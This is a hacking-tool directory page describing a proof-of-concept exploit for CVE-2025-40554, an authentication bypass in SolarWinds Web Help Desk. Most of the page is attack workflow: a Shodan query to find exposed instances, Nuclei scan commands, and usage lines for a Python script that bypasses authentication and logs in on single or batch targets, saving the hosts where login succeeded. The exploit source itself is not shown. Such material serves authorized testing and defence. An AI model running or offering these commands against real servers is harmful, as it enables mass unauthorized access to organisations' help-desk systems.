Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
auth-bypass-CVE-2025-40554 — Proof-of-concept exploit for CVE-2025-40554, an authentication bypass in SolarWinds Web Help Desk. Includes Nuclei template and Python exploit for single or batch target testing with optional credential login. | Kitploit
Tools/GitHubGitHub/imbas007/auth-bypass-cve-2025-40554
Authentication & AuthorizationVulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubimbas007/auth-bypass-cve-2025-40554

auth-bypass-CVE-2025-40554

Proof-of-concept exploit for CVE-2025-40554, an authentication bypass in SolarWinds Web Help Desk. Includes Nuclei template and Python exploit for single or batch target testing with optional credential login.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
147 months agoNot yet reviewed

CVE-2025-40554 – SolarWinds Web Help Desk Auth Bypass PoC

shodan Query

root@kitploit:~
http.favicon.hash:"1895809524"

Nuclei

root@kitploit:~
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
root@kitploit:~
pip install -r requirements.txt

Usage

Single target (bypass + login, default client/client):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443
image

Single target with custom credentials:

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass

Single target, bypass only (no login):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login

Target list (saves vulnerable+login only):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt

Target list with custom credentials:

root@kitploit:~
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret

Quiet mode (print only URLs where login succeeded):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt -q

Disclaimer

This PoC is for authorized security research and testing only. Unauthorized access to computer systems is illegal. The authors are not responsible for misuse.

Download Tool